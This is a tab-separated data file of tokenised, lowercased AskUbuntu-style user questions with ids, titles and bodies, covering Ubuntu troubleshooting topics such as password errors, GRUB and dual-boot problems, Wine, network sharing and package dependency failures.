483035	why am i getting error essages when i am trying to change my password ?	i am running ubuntu 12.04 on a dell inspiron 1520 . i am new to linux and ubuntu . actually , i forgot my password . then i followed help directions to log in as root . after that i changed one password using passwd . but on logout i had problems . the program would not accept input either from keyboard or mouse . i ended up by powering down my pc . now the password was changed and my login to ubuntu was successful . then i tried to change another password . but now passwd gives me an error message : passwd : can not lock /etc/shadow also chpasswd gives an error message : pam_chauthtok ( ) failed , error : authentication token manipulation error . neither will change the password . i went back and tried to change first password again . but i got the same error messages . how do i get my system working again ?
483041	smartphone q5 q9000	i need to install ubuntu for smartphones in my q5 q9000 because something is failing in android and i am really stucked and i prefer to install only ubuntu if it is possible . 多can help me please ? here are some information about the phone : brand n/a model q9000 ( q5 ) color black type brand new form factor bar phone operating system android 4.2.1 keyboard touch screen language bahasa indonesia , bahasa melayu , cestina , deutsch , english , espanol , filipino , francais , italiano , magyar , nederlands , portugues ( brasil ) , portugues ( portugal ) , romana , tieng viet , turkce , greek , russian , hebrew , korean , simplified chinese , traditional chinese networking gsm , wcdma frequency 2g : gsm 850/900/1800/1900 ; 3g : wcdma 850/900/2100 mhz data transfer gprs , hspa , edge sim type ordinary sim + micro sim sim slot 2 network standby dual network standby network conversation one-party conversation only wi-fi yes gps yes processor mtk6589 1.2ghz cpu type quad-core gpu powervr sgx 544mp ram 1gb rom 4gb available memory 2.6gb memory card supports micro sd / tf card up to 32gb in size ( not included ) screen size 5.0 inch touch screen capacitive resolution 1280 x 720 pixels colors 16m camera 8.0 mp flash yes auto focus yes video 4096 x 2304 touch focus yes secondary camera supported yes secondary camera lens 5.0mp bluetooth support v2.0 i/o interface 1 x micro usb , 1 x 3.5mm , 1 x mic , 1 x tf , 2 x sim slots software play store , e-mail , gmail , calculator , file manager , clock , calendar , galleries , todo , video player , sound recorder , voice search , etc . features 5.0 '' hd + dual network standby + android 4.2.1 + wi-fi + gps + fm + 8.0mp camera + 5.0mp secondary camera + quad-core fm yes tv no format supported avi , mp4 , 3gp , mov , mkv , flv , flac , ape , mp3 , ogg , amr , aac , jpg , png , bmp , gif sensor g-sensor , proximity , light sensor battery type lithium battery capacity 2500 mah talk time 200 minutes standby time 180 hours
483043	ubuntu 12.04 - bookmarks in desktop menu bar	i asked this before but the responses were n't valid and i can not reply to it , so i have to ask again ... ubuntu 12.04 i somehow wound up with a bookmark for a web page on my main menu bar ( the one at the top of the desktop with `` applications '' and `` places '' ) how can i delete it , or add other bookmarks ? please note this bookmark is not in any firefox toolbar . it 's in the main menu bar that 's in the ubuntu desktop . not in any application-specific menu .
483046	is ubuntu automatically bootable ?	i 'm just wondering if if i 'm going to have to build a disc or write a disc . if i need to build a disc in order to make it bootable , can you give me some instructions on how to do so ? i 'd most likely be using imgburn , but if you would recommend a different burner , i 'll gladly take suggestions .
483048	why is my mythbuntu install missing /sbin/mount.nfs ?	i am trying to mount an nfs share on my mythbuntu installation , but am getting this error : mount : wrong fs type , bad option , bad superblock on 192.168.10.190 : /share , missing codepage or helper program , or other error ( for several filesystems ( e.g . nfs , cifs ) you might need a /sbin/mount. < type > helper program ) in some cases useful info is found in syslog - try dmesg | tail or so dmesg | tail yields nothing of interest , but if it does seem that i am indeed missing /sbin/mount.nfs : ls /sbin/mount* /sbin/mountall /sbin/mount.cifs /sbin/mount.fuse /sbin/mount.lowntfs-3g /sbin/mount.ntfs /sbin/mount.ntfs-3g /sbin/mount.smbfs why would this be missing , and what should i do to rectify ?
483050	i keep getting this dd : /dev/rdisk1 : invalid argument ?	any idea what i 'm doing wrong ? to get that invalid argument error ?
483051	what can 7zip do that archive manager can not ?	7zip is very popular in the ubuntu software centre . but ubuntu comes with its own archive manager , which appears to support many formats , both compression and decompression . what can 7zip do that archive manager can not ? and if 7zip is open source , why does n't ubuntu use it as its archive manager instead ?
483052	how do i do a notifyaddrchange	i am running 14.04 ubuntu , my problem is with netflix desktop which will not recognize pipelight-silverlight5.1 , i have installed two versions of firefox one in ubuntu one in wine both read the silverlight no problem . i ran the winefix debug shell and found the problem ... .. thomas @ thomas-dell-dm051 : ~/.wine/dosdevices/c : $ netflix-desktop fixme : iphlpapi : notifyaddrchange ( handle 0xece8b0 , overlapped 0xece8bc ) : stub wine : configuration in '/home/thomas/.wine ' has been updated . [ install-dependency ] wine-flash-installer is already installed in '/home/thomas/.wine-pipelight ' . [ install-dependency ] wine-flash-installer is already installed in '/home/thomas/.wine-pipelight ' . 1402710520065 addons.repository warn unknown type id when parsing addon : 5 1402710520072 addons.repository warn unknown type id when parsing addon : 5 1402710520539 addons.update-checker warn update manifest for { 972ce4c6-7e08-4474-a285-3208198ce6fd } did not contain an updates property 1402710520623 addons.update-checker warn update manifest for webapps-team @ lists.launchpad.net did not contain an updates property 1402710520705 addons.update-checker warn update manifest for online-accounts @ lists.launchpad.net did not contain an updates property 1402710520726 addons.update-checker warn update manifest for { 2e1445b0-2682-11e1-bfc2-0800200c9a66 } did not contain an updates property 1402710520745 addons.update-checker warn update manifest for ubufox @ ubuntu.com did not contain an updates property how do i make this permanent . i 'm pretty new so if you could explain , thanks alot .
483053	wlan0 scans but does n't connect	i have two older dell computers now working on lubuntu . had much trouble getting the broadcom cards to work , but with askubuntu help , they are now working . however , although wlan0 scans , sees my wifi , and asks me for a password , it does nothing when i enter that password . i can sign on easily using the terminal command [ nmcli dev wifi con “ssid” password “password” ] and the computer re-accesses the network perfectly each time i restart . any way to make the scan on the wlan0 work ? eth0 and wlan0 are the only two indicators i have , since nm-applet per se is n't there . once , a network manager dialog popped up , and i was able to enter the password there , but that usually does n't happen .
483058	wine stopped working . how do i re-install w/o losing data	wine has mysteriously stopped working . i have decided to simple entirely remove and re-install wine , but before i do this i want to make sure that i will not loose any of the multitudes of files and programs i have saved and installed on wine in the past . can i just backup `` drive_c '' and `` dosdevices '' inside the .wine foider , then entirely remove the .wine directory ( rm -rf ~/.wine ) , install wine again , and then just plop the backed-up folders back in the directory ? would i be able to run the programs normally ? also , since i am already writing this , i might as well add what i know about what went wrong with wine . i am on ubuntu 12.04 . wine worked fine about a week ago , and mysteriously stopped working . if i run winecfg.exe , the process runs ( according to top command ) , but nothing appears on screen . it just takes up 100 % of one of my cpus . the same exact thing happens if i run winetricks or try and run a .exe program in wine . a process appears in top , takes up cpu , but nothing happens . if i run wine through terminal , the results are as follows : user @ computer : ~/downloads/spaceengine 0.97/system $ wine spaceengine.exe modify_ldt : invalid argument modify_ldt : invalid argument modify_ldt : invalid argument modify_ldt : invalid argument modify_ldt : invalid argument err : seh : raise_exception exception frame is not in stack limits = > unable to dispatch exception . i tried updating wine , but that did nothing . so might as well just wipe the install and start again . so how do i be sure i do n't loose data ?
483063	ubuntu 12.04 lts login screen extreamly slow	i have ubuntu 12.04 lts and i had to reinstall it for some reasons . it hat to be reinstalled twice actually . so now that it 's working fine i have one problem . the login screen it very slow . it takes some time like 1 minute to change into a new desktop environment for the first time ( gnome [ i use unity but tried gnome ] ) . i am going to install kde but at this speed it will take too much time to just login . and the mouse is slow too when i use it to change desktop environments or to scroll between accounts . how can i fix this problem . and i 've already seen thevery slow mouse on login screen thing . did not work . also i am thinking of using the previous kernel for ubuntu so if i want how can i unhold the kernel i am using currently ? i am using this command to hold it sudo aptitude hold linux-image-2.6.27-9-generic linux-headers-2.6.27-9-generic linux-headers-2.6.27-9
483064	mysql-server-5.5 has unmet dependencies	every time i open the software center i get this message : item can not be installed or removed until package catalog is repaired i click repair then i get package operation failed i tried to remove mysql-server-5.5 using terminal sudo apt-get -- purge remove mysql-server-5.5 and i got this message : the following packages have unmet dependencies : mysql-server : depends : mysql-server-5.5 but it is not going to be installed '' i got the same message when tried to install it . i 'm running ubuntu 12.04 edit : i tried : sudo apt-get remove mysql-sever and i got this : dpkg : error processing mysql-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 update 2 : the system has sent me a message that this is a bug :
483066	how do i install drivers for a netgear wnda3100v2 ?	i have a netgear wnda3100v2 usb wifi adapter , and i need to figure out how to install the drivers . i have the disc that came with the adapter . what do i need to install in order to use this on ubuntu 14.0.4 ? and how do i install those programs without an internet connection ?
483069	installing grub in one hard disk only	initially , my laptop has only one hdd with mainly three partitions which contains ubuntu , windows and data ( excluding the swap , boot , recovery partitions ) . i used gpt as my partition scheme . now , i added ssd to my laptop . i now have two hdd technically . i installed ubuntu in ssd and deleted the ubuntu in hdd . my ubuntu can not read my windows . so what i did was installed yannubuntu 's boot-repair and ran recommended repair . the result was i had two windows option in the grub . when i boot in my ubuntu , i had to suspend and wake the operating system up in order to regain wireless connection . i assume that this has to do with having two efi boot partitions both in my ssd and hdd . ssd contents hdd contents also , grub was installed in hdd . i was thinking of removing the grub in hdd and installing grub in ssd should solve the problem ? ? currently , i do n't know what the boot-repair did , whether it installed grub in both ssd or hdd . or just fixed the grub in hdd . i do not know . but this might give you a hint.. i ran advanced boot options and tried installing grub to sda and unchecked installing grub to both ssd and hdd . and an error message has appeared .
483072	install ubuntu 14 on old hp proliant dl380 server	i have an old hp dl380 server with a couple of dual core 3.66 ghz xeons in it . will ubuntu 14 go on it ? i tried to install a 64 bit iso from dvd and it initiated the install screen , then did a restart and nothing but a blank screen since ? ( went back into my goodies drawer , pulled out windows 7x32 and installed that without a hitch )
483074	how to download and install 'ubuntu for android '	i searched a lot but did n't got any link to download 'ubuntu for android ' . also , i am not talking about getting 'ubuntu touch ' , it replaces android os rather than just running when phone is docked like 'ubuntu for android ' do .
483076	live cd boots from usb - system is 100 % - install fails	i have an old asus eepc 1005ha that i 'd like to get a functional ubuntu-based distro on -- ideally something later than the netbook remix versions 9 and 10 , both of which run well on livecd and install and run well from the hd . the machine seems to be able to run livecd 'try without install ' versions of 12 and 13 under unity without issue . it runs 14.04 unity with some minor screen-depth/mouse-border issues that seem eminently fixable . it runs lighter debian- > ubuntu distros like latest version mint/cinnamon and crunchbang absolutely perfectly . all from livecd usbs created on a host of devices with unetbootin , universal and other methods . but i can not complete an install to the hd . if i start the gui installer , it either hangs immediately following keyboard selection , or if i rush past that - that works , but then it reboots towards the very end of the install process , at the point where it says 'configuring keyboard . ' where the crashes have given back data , the errors are kernel panics . what in the install process ( configuring keyboard ? ) could cause a kernel panic at this point ?
483078	i ca n't boot through usd or cd-room after installing ubuntu	last week i decided to install ubuntu on my laptop with pre-installed windows 8 ( 64bit ) on it and the process went smooth . yesterday i have decided to reformat my laptop using my windows 7 installer for the reason that i still need windows and reconsidering to dual boot with ubuntu.. but the problem is my cd drive now is not readable and does n't show on boot menu , i 've tried my usb installer but same problem again . please help me , i really do n't know what to do.. i already tried searching for solutions , repairing my boot but the problem still exists . /dev/sda1 fat32 /boot/efi 487.00mib 4.32mib 482.68mib unused flags - boot /dev/sda2 ext4 / 461.40gib /dev/sda3 linuxswap 3.89gib unallocated 1.02mib i needed to partition my drive , install windows 7 and ubuntu on it . for boot-repair : following error occurred during the repair . please write on a paper the following url : http : //paste.ubuntu.com/7638031/ in case you still experience boot problem , indicate this url to : boot.repair @ gmail.com you can now reboot your computer . the boot files of [ the os now in use - ubuntu 14.04 lts ] are far from the start of the disk . your bios may not detect them . you may want to retry after creating a /boot partition ( ext4 , > 200mb , start of the disk ) . this can be performed via tools such as gparted . then select this partition via the [ separate /boot partition : ] option of [ boot repair ] . ( https : //help.ubuntu.com/community/bootpartition thank you ( maraming salamat - filipino )
483080	copying hard drive ( ~100 gigs ) to a 2 terrabyte drive , tries to copy 143 terrabyes	recently i have been trying to make a full backup of my linux parition ( of just a few hundred gigs- 3 tops ) to my backup drive of 2 terrabytes ( almost empty ) , i keep having an issue with running out of disk space right before it starts copying and the thing saying how much is left to copy says something like 143 terrabytes ? any idea why this might be ?
483082	truecrypt 7.1a on 14.04 mount issue	try to mount a truecrypt file error : device-mapper : resume ioctl on truecrypt8 failed : invalid argument command failed
483085	grub 2 wont show window8	i installed ubuntu 14 . 04 on my lenovo ideapad 580 ( 4gb ram , 500gb hdd , i3 , windows8 preloaded ) . i switched from uefi to legacy mode . then i had a grub issue and ubuntu wo n't load at all . i tried boot repair tool and typed the commands in terminal from various links on internet and voilă ubuntu started loading normally but as it appears maybe it overwrote my windows boot loader . now grub2 shows ubuntu only not windows at all . i can enter bios and change the boot priorities but making windows on top wo n't do any good . i think boot repair tool has done this . i do not have any cd . i do n't want to loose ubuntu at all because i have employed a large amount of time messing with it and installing . boot repair info link is http : //paste.ubuntu.com/7638104/
483087	virtaul host not work when i unplugged nic and turn off wifi	i am facing a strange problem with ubuntu 14.04 . previously i used ubuntu 12.04 and same thing worked . i installed ubuntu 14.04 ( 32 bit ) on my machine and installed lamp ( apache2 , mysql and php ) virtual hosts on this machine . virtual hosts work when internet connection is available but once i unplugged the cable and wifi connection . vhost stop work . here is the config file of i am using < virtualhost 127.0.1.4:80 > servername development.local serveralias www.development.local serveradmin nitinsonitest @ gmail.com documentroot /var/www/development < directory /var/www/development > allowoverride all order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log customlog $ { apache_log_dir } /access.log combined < /virtualhost > also add this in my hosts file ( located at /ets/hosts ) 127.0.1.4 development.local one of my friend face same issue in window machine that was resolved by urn on dns client service . can any one have any idea about this . please excuse me for bad english . any hint will be appretiate . thank
483090	mount : protocol error on a linux mint vm	here 's my hid and gid anadi @ petra ~/code $ sudo getent passwd | grep anadi anadi : x:1000:1000 : anadi misra , , , :/home/anadi : /bin/bash the folder i have shared on virtual box is available on the vm anadi @ petra / $ cd /media/ anadi @ petra /media $ ls -ltr total 4 drwxrwx -- - 1 root vboxsf 1054 may 24 10:26 sf_code drwxr-x -- -+ 3 root root 4096 jun 13 22:08 anadi anadi @ petra /media $ sudo ls -ltr sf_code/ total 33496 drwxrwx -- - 1 root vboxsf 204 may 15 2013 myapple -rwxrwx -- - 1 root vboxsf 34297072 may 22 2013 selenium-server-standalone-2.33.0.jar drwxrwx -- - 1 root vboxsf 204 jun 14 2013 droid-workspace drwxrwx -- - 1 root vboxsf 442 aug 10 2013 java-concurrency-code drwxrwx -- - 1 root vboxsf 306 aug 31 2013 css3_menu_demo drwxrwx -- - 1 root vboxsf 102 aug 31 2013 aptana3workspace drwxrwx -- - 1 root vboxsf 408 aug 31 2013 dart drwxrwx -- - 1 root vboxsf 408 aug 31 2013 akka-2.2.1 drwxrwx -- - 1 root vboxsf 306 sep 10 2013 ruby drwxrwx -- - 1 root vboxsf 272 sep 27 2013 scala-docs-2.10.3 drwxrwx -- - 1 root vboxsf 340 oct 6 2013 puppet-syntax-vim drwxrwx -- - 1 root vboxsf 170 oct 6 2013 gepetto-workspace drwxrwx -- - 1 root vboxsf 136 oct 14 2013 agile-network drwxrwx -- - 1 root vboxsf 170 nov 9 2013 emacs drwxrwx -- - 1 root vboxsf 136 feb 6 10:02 vpworkspace drwxrwx -- - 1 root vboxsf 238 feb 6 11:45 workspace drwxrwx -- - 1 root vboxsf 68 feb 6 11:46 apache drwxrwx -- - 1 root vboxsf 204 feb 6 11:47 big-data drwxrwx -- - 1 root vboxsf 204 feb 14 19:25 codedeploy drwxrwx -- - 1 root vboxsf 238 feb 21 20:41 workspace-sts-3.4.0.release drwxrwx -- - 1 root vboxsf 340 feb 27 01:27 bitbucket drwxrwx -- - 1 root vboxsf 306 mar 13 23:12 heroku drwxrwx -- - 1 root vboxsf 136 apr 28 11:03 meetup drwxrwx -- - 1 root vboxsf 170 may 6 12:21 github drwxrwx -- - 1 root vboxsf 238 may 24 09:55 api drwxrwx -- - 1 root vboxsf 170 may 24 10:27 workspace-sts-3.5.1.release drwxrwx -- - 1 root vboxsf 204 jun 4 13:34 devops drwxrwx -- - 1 root vboxsf 612 jun 13 10:43 proj-emc however mounting it for user anadi : anadi does not work anadi @ petra ~ $ sudo mount -t vboxsf -o uid=1000 , gid=1000 code /home/anadi/code mount : protocol error any ideas what might be going wrong here .
483092	pc hanged , after i restarted it shows grub rescue !	my pc has 5 years old . it hangs every 5 mins and then i restarted , it shows `` no such partition grub rescue ... etc '' like this . i plugged out my pc and plugged in , then turned on my pc . pc did't turn on . i waited for 40mins and turn it on again . it worked but next to 5 mins . it hanged again . ***sorry for bad eng .
483097	resizing wubi disk size does not reflect the increase in /dev/loop0	i am using ubuntu 12.04 lts . i used the instructions at : https : //help.ubuntu.com/community/resizewubidisk to increase ubuntu disk size ( i used the live resize option ) . following are my observations : 1 ) the output for df -h does not show any increase in the size and size of /dev/loop0 remains the same . 2 ) as a side effect the amount of memory that i opted for increase is subtracted from the free space of /dev/sda5 ( which is /host ) . 3 ) the last command caused an abrupt shutdown . how can i explain this behaviour ?
483098	unable to access shared internet connection	thank for reading my post . i have setup ubuntu 12.04 server on an unused box . my idea is to use it for development and as a router . i have 2 network cards installed . eth0 is connected to my adsl modem . it has been put in bridge mode and i can connect to it and surf the web via command line in a terminal window . eth1 is connected to a netgear n300 wireless router . i want the router to maintain the wireless connection so i have setup the router to get ip 's from external host . this seems to work because both wired and wireless connected pc 's get ip 's as specified in my dhcp setup . i followed a number of tutorials for the setup and did the following . installed bind , dhcp and setup the network interfaces . my network.interfaces is setup like this : eth0 dhcp dsl-provider inet ppp eth1 static address 192.168.10.1 dhcpd.conf setup with a ip range of 192.168.10.10 - 192.168.10.100 isc-dhcp-server is set to eth1 ip_forward set to 1 in sysctl.conf i have added iptables rules and also removed them . i tried many options found on the net but i can never get any connected pc 's to have internet . i can get an ip using dhcp on windows , ping the router from windows , see its apache webserver and even use webmin but i can not surf the web . please help ; i have been frustrated by this for a few days now . it just seems that no matter what iptables changes i make it makes no difference . any help would be appreciated . output from route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 0.0.0.0 0.0.0.0 u 0 0 0 ppp0 192.168.10.0 0.0.0.0 255.255.255.0 u 0 0 0 eth1 192.168.122.0 0.0.0.0 255.255.255.0 u 0 0 0 virbr0 203.215.9.249 0.0.0.0 255.255.255.255 uh 0 0 0 ppp0 output from ifconfig : eth0 link encap : ethernet hwaddr c0:4a:00:03 : b8:57 inet6 addr : fe80 : :c24a : ff : fe03 : b857/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:32756 errors:0 dropped:0 overruns:0 frame:0 tx packets:16689 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:40066231 ( 40.0 mb ) tx bytes:1432743 ( 1.4 mb ) eth1 link encap : ethernet hwaddr 00:1e : c9:3e : f2 : b4 inet addr:192.168.10.1 bcast:192.168.10.255 mask:255.255.255.0 inet6 addr : fe80 : :21e : c9ff : fe3e : f2b4/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:8307 errors:0 dropped:0 overruns:0 frame:0 tx packets:3397 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:850486 ( 850.4 kb ) tx bytes:1626159 ( 1.6 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:227 errors:0 dropped:0 overruns:0 frame:0 tx packets:227 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:15573 ( 15.5 kb ) tx bytes:15573 ( 15.5 kb ) ppp0 link encap : point-to-point protocol inet addr : ... p-t-p:203.215.9.249 mask:255.255.255.255 up pointopoint running noarp multicast mtu:1492 metric:1 rx packets:27538 errors:0 dropped:0 overruns:0 frame:0 tx packets:15858 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:3 rx bytes:38982044 ( 38.9 mb ) tx bytes:945159 ( 945.1 kb ) virbr0 link encap : ethernet hwaddr 06 : fe : c2:46:9b:55 inet addr:192.168.122.1 bcast:192.168.122.255 mask:255.255.255.0 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b )
483100	getting issue in making .deb package of qt 5.2.1 app to deploy on ubuntu 14.04	i want to make .deb package for the qt 5 .2.1 desktop app for ubuntu 14.04 64 bit . i have installed qt 5.2.1 on ubuntu 14.04 and made a demo app for the testing purpose in which i have used qt webkitwidgets . during in making the .deb package of the app i am getting the below issues . /usr/bin/ld : warning : libicui18n.so.51 , needed by /opt/qt5.2.1/5.2.1/gcc_64/lib/libqt5core.so.5.2.1 , not found ( try using -rpath or -rpath-link ) /usr/bin/ld : warning : libicuuc.so.51 , needed by /opt/qt5.2.1/5.2.1/gcc_64/lib/libqt5core.so.5.2.1 , not found ( try using -rpath or -rpath-link ) /opt/qt5.2.1/5.2.1/gcc_64/lib/libqt5core.so.5.2.1 : undefined reference to ucal_opentimezones_51' /opt/qt5.2.1/5.2.1/gcc_64/lib/libqt5core.so.5.2.1 : undefined reference touenum_next_51' /opt/qt5.2.1/5.2.1/gcc_64/lib/libqt5core.so.5.2.1 : undefined reference to ucal_clone_51' /opt/qt5.2.1/5.2.1/gcc_64/lib/libqt5core.so.5.2.1 : undefined reference toucnv_getstandardname_51' /opt/qt5.2.1/5.2.1/gcc_64/lib/libqt5core.so.5.2.1 : undefined reference to ucol_close_51' /opt/qt5.2.1/5.2.1/gcc_64/lib/libqt5core.so.5.2.1 : undefined reference toucol_strcoll_51' /opt/qt5.2.1/5.2.1/gcc_64/lib/libqt5core.so.5.2.1 : undefined reference to ucnv_getmaxcharsize_51' /opt/qt5.2.1/5.2.1/gcc_64/lib/libqt5core.so.5.2.1 : undefined reference tou_strtolower_51' /opt/qt5.2.1/5.2.1/gcc_64/lib/libqt5core.so.5.2.1 : undefined reference to `ucnv_getavailablename_51' and many more undefined reference error ... ... . i found that qt5 webkitwidgets takes the reference of icu library in ubuntu and these errors are due to qt5 webkitwidgets dependency on icu library in qt 5 . these icu .so files are at path /opt/qt5.2.1/5.2.1/gcc_64/lib/ in machine but these files are not referenced during the .deb packaging . i downloaded and installed the icu library for linux from the link http : //download.icu-project.org/file ... -rhel6-x64.tgz into the my machine and compile and build the icu .so files and included the the same into the .pro file . still there is linking issue with icu .so files exists . this icu library is for red hat enterprise linux 6.2 ( x86 64-bit ) gcc 4.4.6 because i did not get the same for the ubuntu 14.04 64 bit , so i have used this . is there any dependency file missing issue to deploy qt 5.2.1 app in ubuntu 14.04 ? please have look into the issue and let me know where i did wrong . thanks .
483102	how to solve random black screen when booting win7 ( dual boot ubuntu14.04 ) ?	i 've installed kubuntu 14.04 next to win7 and this weird came : kubuntu boots perfectly well each time . picking ( in grub ) win7 cause ( most of times ) black screen . the funny is i can hear win7 's starting sound , wtf ? the weirdest : when i do 'e ' on win7 ( in grub ) for edit , but no change at all , just f10 for boot . in oterh words i do this when grub shows : highlight win7 tap 'e ' key tap 'f10 ' key then win7 starts normally . o_o i can provide any other details , tell my which . please help .
483103	14.04 can not recognise graphics card	how do i configure to overcome this start up message ? `` your screen , graphics card and input device settings could not be detected correctly . you will need to configure yourself ''
483105	unity `` slow '' to apply settings	hello ubuntu community ! i performed a new ubuntu 14.04 64 bits install ( fresh new install , not an upgrade ) . all went correctly , but unity/ubuntu has a strange behavior ... it starts correctly , but takes some time to what i would call `` apply settings '' . once it 's loaded , unity seems ok and is working fine . but some `` settings '' or `` configuration '' is only applied after 15 ~ 20 seconds . examples i could notice : terminal firstly shows an usual font , and after some time automatically uses the real font same for nautilus ( needs a nautilus -q ) i 'm left-handed and i setup right mouse button as the main mouse button ( using `` system settings '' = > `` mouse '' ) ; this choice is n't loaded at boot : button exchange is only applied later , at the same time terminal and nautilus go to their real font . i checked my ~/.xsession-errors = > no error dmesg does n't show anything interresting . there 's no particular event logged when terminal switches its font . what i did : fresh .iso downloaded and moved to usb key for install ( tried several time + different usb keys ) fresh install ( tried several times ) on first boot , i let update manager do its job and let reboot the computer here is my configuration : gigabyte ga-z77-d3h motherboard ( intel z77 chipset ) core i5-3570k cpu 16 gb ram using cpu 's igp ( intel ivybridge desktop ) using motherboard 's network interface + sound card samsung ssd 840 pro hdd ( 1 single ext4 partition , mounted on / ) other hdd ( two partitions : my old /home ext4 partition currently mounted on /toto + swap ) enermax usb keyboard that has an embeeded sound card uname -a output : linux patecroute 3.13.0-29-generic # 53-ubuntu smp wed jun 4 21:00:20 utc 2014 x86_64 x86_64 x86_64 gnu/linux lsmod output : module size used by rfcomm 69160 0 bnep 19624 2 bluetooth 395423 10 bnep , rfcomm snd_hda_codec_hdmi 46207 1 snd_hda_codec_via 27860 1 joydev 17381 0 snd_usb_audio 153450 2 snd_usbmidi_lib 29215 1 snd_usb_audio snd_hda_intel 52355 3 snd_hda_codec 192906 3 snd_hda_codec_hdmi , snd_hda_codec_via , snd_hda_intel snd_hwdep 13602 2 snd_usb_audio , snd_hda_codec snd_pcm 102099 4 snd_usb_audio , snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel intel_rapl 18773 0 x86_pkg_temp_thermal 14205 0 intel_powerclamp 14705 0 coretemp 13435 0 kvm_intel 143060 0 kvm 451511 1 kvm_intel crct10dif_pclmul 14289 0 crc32_pclmul 13113 0 ghash_clmulni_intel 13216 0 aesni_intel 55624 0 aes_x86_64 17131 1 aesni_intel lrw 13286 1 aesni_intel gf128mul 14951 1 lrw glue_helper 13990 1 aesni_intel ablk_helper 13597 1 aesni_intel cryptd 20359 3 ghash_clmulni_intel , aesni_intel , ablk_helper snd_page_alloc 18710 2 snd_pcm , snd_hda_intel i915 783703 3 snd_seq_midi 13324 0 serio_raw 13462 0 snd_seq_midi_event 14899 1 snd_seq_midi snd_rawmidi 30144 2 snd_usbmidi_lib , snd_seq_midi snd_seq 61560 2 snd_seq_midi_event , snd_seq_midi drm_kms_helper 52758 1 i915 drm 302817 4 i915 , drm_kms_helper snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi snd_timer 29482 2 snd_pcm , snd_seq lpc_ich 21080 0 snd 69238 23 snd_usb_audio , snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_hda_codec_via , snd_pcm , snd_seq , snd_rawmidi , snd_usbmidi_lib , snd_hda_codec , snd_hda_intel , snd_seq_device , snd_seq_midi i2c_algo_bit 13413 1 i915 soundcore 12680 1 snd mei_me 18627 0 mei 82276 1 mei_me video 19476 1 i915 parport_pc 32701 0 mac_hid 13205 0 ppdev 17671 0 lp 17759 0 parport 42348 3 lp , ppdev , parport_pc hid_generic 12548 0 usbhid 52570 0 psmouse 102222 0 alx 32452 0 hid 106148 2 hid_generic , usbhid mdio 13807 1 alx i would be pleased to provide more information or do some tests . thanks for any help . regards , fabrice
483106	bind `` super ( win ) key '' release event ( not press ) in xfce 4.10	the heading says it all . in short i want to have the behavior as in gnome-shell : when i release the super key , the overview is triggered . with xfce , i want it to trigger the main menu . i have the whisker plugin installed , so its just the matter to selecting xfce4-popup-whiskermenu as the command for the shortcut , but the problem i am facing is that simply selecting super key binds it to `` press '' event rather than release , which is not what i want . there doesnt seem to be a way to do it via the settings manager gui . is there a way to edit xfce configuration files to achieve this ?
483107	ubuntu server 14.04 crashing after while	my ubuntu server 14.04 stops working after week or so . if i reboot it , it starts working again and works for a while but in a week it stops responding to pings and i can not ssh or anything . if i try to ping it , the server responds `` destination host unreachable. '' . i know this is n't much information to resolve this problem but i really do n't know where to start looking for . which log file might be recording failures what causes this kind of problem . this might be a hw issue or maybe temperatures cause my server did this same thing before i reinstalled ubuntu .
483109	how to interact with python scripts on geany after running , just like on idle	on idle after running a script/program made with python by pressing f5 , you could still interact with the program even after it finished running . but on geany , when running it , and when the program finishes , it just asks to '' press return to continue '' i spent a while trying to finding a way to do that on geany as well but came up with no luck , so i was wondering if there were any ways that add the functionality of interacting with the program after it runs on geany ?
483111	how to do administartive tasks from remote x ssh	i forwarded x over ssh . from unity-control-center i could n't perform any of the administrative tasks like changing audio input , changing wifi network etc . how can i do them remotely . its the same problem even when i connect through remote desktop . i think its some thing to do with policy kit . i could never remotely operate x since my introduction to ubuntu ; its 5yrs bck !
483114	recovering from partial upgrade precise to saucy	i 'm on ubuntu 12.04 lts and i had the bad idea to add a saucy repository ( saucy main universe ) to the /etc/apt/sources.list and to run sudo apt-get update & & sudo apt-get upgrade . at some point it stopped , because of an error with xserver-common . now that i have restarted my computer , i can only see my background image when i log in . i opened tty1 , put the repository line in the sources.list in comment and tried a few commands : lsb_release -a gives me release 13.10 and uname -a precise . sudo apt-get install -f , sudo dpkg -- configure -a and sudo dpkg-reconfigure -phigh -a ran without any problem but it did n't resolve anything . i also tried sudo apt-get dist-upgrade and sudo do-release-upgradebut there was n't anything to upgrade or no new release found . how can i either get back to a stable system with precise or completely upgrade to trusty ? thank you so much . requested logs : /var/log/apt/history.log /var/log/apt/term.log current state of xorg/linux packages : dpkg -- list xserver-* linux-*
483116	error 255 when sharing folder on ubuntu 12.04	i try to share folder on ubuntu , the steps i did : right click on folder i clicked sharing options then i clicked share this folder then i clicked create share i got this message : 'net usershare ' returned error 255 : net usershare add : can not share path.. how to fix this .
483118	bootloading window7 problem	whenever i try to load from ubuntu 14.04 boot loader to windows 7 , i select windows7 but it does not start . please help . thank
